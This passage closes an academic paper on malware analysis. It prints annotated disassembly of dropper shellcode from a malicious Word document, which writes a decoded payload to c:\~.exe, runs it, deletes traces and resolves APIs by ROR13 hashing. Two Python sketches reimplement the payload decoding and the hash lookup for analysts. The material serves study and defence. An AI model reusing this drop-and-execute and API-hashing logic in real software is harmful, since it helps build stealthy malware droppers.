seg000:00000CF4
seg000:00000CF4 ; At this point, the decoded payload exists on the heap. What to do with it?
seg000:00000CF4 ; Write it to disk of course! And use the last remaining unicode string as its
seg000:00000CF4 ; file name.
seg000:00000CF4
seg000:00000CF4  push  0
seg000:00000CF6  push  80h
seg000:00000CFB  push  2
seg000:00000CFD  push  0
seg000:00000CFF  push  0
seg000:00000D01  push  40000000h
seg000:00000D06  push  [edi+SCRATCH.String2] ; c:\~.exe
seg000:00000D09  call  [edi+SCRATCH.pCreateFileW]
seg000:00000D0C  mov   [edi+SCRATCH.hFileTwo], eax
seg000:00000D0F  push  0
seg000:00000D11  lea   ebx, [edi+SCRATCH.endMarker]
seg000:00000D17  push  ebx
seg000:00000D18  push  [edi+SCRATCH.field_4]
seg000:00000D1B  push  [edi+SCRATCH.pMallocdBuff0]
seg000:00000D1E  push  eax
seg000:00000D1F  call  [edi+SCRATCH.pWriteFile]
seg000:00000D22  push  0
seg000:00000D24  lea   ebx, [edi+SCRATCH.endMarker]
seg000:00000D2A  push  ebx
seg000:00000D2B  push  0FFh
seg000:00000D30  push  [edi+SCRATCH.szDOCFILENAME]
seg000:00000D33  push  [edi+SCRATCH.hFileTwo]
seg000:00000D36  call  [edi+SCRATCH.pWriteFile]
seg000:00000D39  push  [edi+SCRATCH.hFileTwo]
seg000:00000D3C
seg000:00000D3C ; The code is cleaning up by closing its open file handles and releasing
seg000:00000D3C ; the heap back to the OS.
seg000:00000D3C
seg000:00000D3C  call  [edi+SCRATCH.pCloseHandle]
seg000:00000D3F  push  [edi+SCRATCH.pMallocdBuff0]
seg000:00000D42  call  [edi+SCRATCH.pGlobalFree]
seg000:00000D45
seg000:00000D45 ; Here the code calls WinExec() to launch the new executable it has just
seg000:00000D45 ; written to disk. Then it deletes the copy of the original Word doc that
seg000:00000D45 ; it saved to c:\~$ and exits.
seg000:00000D45
seg000:00000D45  push  0
seg000:00000D47  push  [edi+SCRATCH.String3] ; c:\~.exe
seg000:00000D4D  call  [edi+SCRATCH.pWinExec]
seg000:00000D50  push  [edi+SCRATCH.String1] ; c:\~$
seg000:00000D53  call  [edi+SCRATCH.pDeleteFileW]
seg000:00000D56  push  0
seg000:00000D58  call  [edi+SCRATCH.pExitProcess]
seg000:00000D58 sub_B45 endp
seg000:00000D58
seg000:00000D5B
seg000:00000D5B ; =============== S U B R O U T I N E =======================================
seg000:00000D5B
seg000:00000D5B ; Attributes: bp-based frame
seg000:00000D5B
seg000:00000D5B resolve_func proc near ; CODE XREF: sub_B45+6Ap
seg000:00000D5B                        ; sub_B45+7Ap ...
seg000:00000D5B
seg000:00000D5B arg_0 = dword ptr 8
seg000:00000D5B arg_4 = dword ptr 0Ch
seg000:00000D5B
seg000:00000D5B  push  ebp ; standard function prologue
seg000:00000D5C  mov   ebp, esp ; standard function prologue
seg000:00000D5E  push  edi ; save the scratch pad again
seg000:00000D5F  mov   edi, [ebp+arg_0] ; move arg[0] into edi
seg000:00000D62  mov   ebx, [ebp+arg_4] ; move arg[1] into ebx
seg000:00000D65  push  esi
seg000:00000D66  mov   esi, [ebx+3Ch]
seg000:00000D69  mov   esi, [esi+ebx+78h]
seg000:00000D6D  add   esi, ebx
seg000:00000D6F  push  esi
seg000:00000D70  mov   esi, [esi+20h]
seg000:00000D73  add   esi, ebx
seg000:00000D75  xor   ecx, ecx
seg000:00000D77  dec   ecx
seg000:00000D78
seg000:00000D78 loc_D78: ; CODE XREF: resolve_func+36j
seg000:00000D78  inc   ecx
seg000:00000D79  lodsd
seg000:00000D7A  add   eax, ebx
seg000:00000D7C  push  esi
seg000:00000D7D  xor   esi, esi
seg000:00000D7F
seg000:00000D7F loc_D7F: ; CODE XREF: resolve_func+31j
seg000:00000D7F  movsx edx, byte ptr [eax]
seg000:00000D82  cmp   dh, dl
seg000:00000D84  jz    short loc_D8E
seg000:00000D86  ror   esi, 0Dh ; rotate right function
seg000:00000D89  add   esi, edx
seg000:00000D8B  inc   eax
seg000:00000D8C  jmp   short loc_D7F
seg000:00000D8E ; ---------------------------------------------------------------------------
seg000:00000D8E
seg000:00000D8E loc_D8E: ; CODE XREF: resolve_func+29j
seg000:00000D8E  cmp   edi, esi
seg000:00000D90  pop   esi
seg000:00000D91  jnz   short loc_D78
seg000:00000D93  pop   edx
seg000:00000D94  mov   ebp, ebx
seg000:00000D96  mov   ebx, [edx+24h]
seg000:00000D99  add   ebx, ebp
seg000:00000D9B  mov   cx, [ebx+ecx*2]
seg000:00000D9F  mov   ebx, [edx+1Ch]
seg000:00000DA2  add   ebx, ebp
seg000:00000DA4  mov   eax, [ebx+ecx*4]
seg000:00000DA7  add   eax, ebp
seg000:00000DA9  pop   esi
seg000:00000DAA  pop   edi
seg000:00000DAB  pop   ebp
seg000:00000DAC  retn  8
seg000:00000DAC resolve_func endp
seg000:00000DAC
seg000:00000DAF ; ---------------------------------------------------------------------------
seg000:00000DAF
seg000:00000DAF loc_DAF: ; CODE XREF: seg000:00000B40j
seg000:00000DAF  call  sub_B45
seg000:00000DAF ; ---------------------------------------------------------------------------
seg000:00000DB4  dd 0A2000h
seg000:00000DB8 aC:
seg000:00000DB8  unicode 0, <c:\~$>,0
seg000:00000DC4 aC_exe:
seg000:00000DC4  unicode 0, <c:\~.exe>,0
seg000:00000DD6 aC_exe_0  db 'c:\~.exe',0
seg000:00000DDF  db 0Eh
seg000:00000DE0  db 0
seg000:00000DE1  db 0FFh
seg000:00000DE2  db 0FFh
seg000:00000DE3  db 0FFh

7. CONCLUSION
Malware analysis is becoming an important field of specialization for forensic analysts. Authors of malware are becoming increasingly profit driven and are incorporating techniques to make their code as stealthy and undetectable as possible. Malware is being written by professional programmers who are very knowledgeable in their craft. They have a very good understanding of digital forensic methods and endeavor to make forensic analysis as difficult as possible. The knowledge domain required to competently analyze malware is very broad. This paper has presented a brief introduction to a Malware Analysis Body of Knowledge that would be suitable for establishing a framework for competency development and assessment for the field of malware analysis and for incorporation into academic curricula. A learning taxonomy is central to the malware analysis process and eight domain areas were identified. These areas include malware, programming, anti-forensics, malware analysis, tools, legal and ethical considerations, environment and collection.
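
As an illustration of the extraction step in the sub_B45 disassembly (offsets C86 through CF2), the following is a minimal Python sketch of the same logic: read a 4-byte length from the end of the file, seek back by that length plus 4 bytes, read the encoded bytes, and XOR each one with 0x81. It is written from the analyst's side, for recovering the payload from a sample, and is not the author's code. The function names extract_payload and build_sample are hypothetical, and the little-endian length field is an assumption based on how a 32-bit x86 ReadFile into a dword would store it.

```python
import io
import struct

XOR_KEY = 0x81  # single-byte key used by the loop at loc_CEA


def extract_payload(stream):
    """Return the decoded payload appended to a seekable binary stream."""
    # Step 1: the last 4 bytes hold the payload length (assumed little-endian).
    stream.seek(-4, io.SEEK_END)
    (length,) = struct.unpack("<I", stream.read(4))

    # Step 2: seek back (length + 4) bytes from EOF. The listing builds this
    # negative offset with add/not/inc, i.e. two's-complement negation.
    stream.seek(-(length + 4), io.SEEK_END)
    encoded = stream.read(length)

    # Step 3: XOR every byte with the static key.
    return bytes(b ^ XOR_KEY for b in encoded)


def build_sample(document, payload):
    """Hypothetical helper: build test data with the same trailer layout."""
    encoded = bytes(b ^ XOR_KEY for b in payload)
    return document + encoded + struct.pack("<I", len(payload))


# Usage with harmless placeholder bytes standing in for a real sample.
sample = build_sample(b"fake document bytes", b"MZ\x90\x00payload")
print(extract_payload(io.BytesIO(sample)))
```

Because the key is a single static byte, the same XOR pass both encodes and decodes, which is why build_sample can reuse it to produce test data.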
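
The resolve_func routine in the disassembly locates API functions by hashing export names rather than storing the names themselves: each name is hashed with a rotate-right-by-13 and add loop (offsets D7F through D8C), the result is compared with the requested hash, and the matching index is mapped through the ordinal table to a function address. The Python sketch below models that lookup on plain lists instead of a real PE export directory. The names ror32, ror13_hash and resolve_by_hash are hypothetical, and returning None when nothing matches is an assumption, since the listing has no such exit.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name):
    """Hash a byte string the way the loop at loc_D7F does."""
    h = 0
    for byte in name:
        if byte == 0:
            # End of string. (The listing's cmp dh, dl test would also stop
            # on 0xFF; that case is ignored here because API names are ASCII.)
            break
        h = ror32(h, 13)
        # movsx sign-extends the byte before it is added.
        signed = byte - 0x100 if byte & 0x80 else byte
        h = (h + signed) & 0xFFFFFFFF
    return h


def resolve_by_hash(base, names, ordinals, function_rvas, target_hash):
    """Model of the export lookup: name index -> ordinal -> address."""
    for index, name in enumerate(names):
        if ror13_hash(name) == target_hash:
            ordinal = ordinals[index]
            return base + function_rvas[ordinal]
    return None  # assumption: the listing itself never gives up


# Usage with made-up table contents.
names = [b"CloseHandle", b"WinExec"]
ordinals = [1, 0]
function_rvas = [0x2000, 0x1000]
address = resolve_by_hash(0x10000, names, ordinals, function_rvas,
                          ror13_hash(b"WinExec"))
print(hex(address))
```

Comparing hashes instead of strings keeps API names out of the shellcode, so a plain strings search of the sample does not reveal which functions it calls.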
REFERENCES
[1]. The Malware Analysis Body of Knowledge - Craig Valli and Murray Brand.
[2]. Reverse Engineering Malware - Lenny Zeltser.
[3]. Malware Analysis: An Introduction - Dennis Distler.
[4]. Introduction to Malware Analysis - Lenny Zeltser.
[5]. Practical Malware Analysis - Kris Kendall.
Author Biography:
Mr. S. Murugan is working as ACTS Team Coordinator, CDAC, Bangalore. He received a BSc in Physics from Madurai Kamaraj University, Madurai, in 1989, an MCA degree in Computer Applications from Alagappa University, Karaikudi, Tamilnadu, India, and an MPhil (CS) from Manonmaniam Sundaranar University, Tirunelveli, Tamilnadu, India. He has 17 years of teaching and administrative experience at PG level in the field of Computer Science. He has published 6 papers in national conferences and 2 in international conferences. His research interests include Intelligence Network Security Algorithms, and malware prevention and detection mechanisms and algorithms. He has published 8 books and courseware in the field of Computer Science.
Dr. K. Kuppusamy is working as an Associate Professor, Department of Computer Science and Engineering, Alagappa University, Karaikudi, Tamilnadu, India. He received his Ph.D. in Computer Science and Engineering from Alagappa University, Karaikudi, Tamilnadu, in the year 2007. He has published many papers in international and national journals and presented at national and international conferences. His areas of research interest include Information/Network Security, Algorithms, Neural Networks, Fault Tolerant Computing, Software Engineering and Testing, and Operational Research.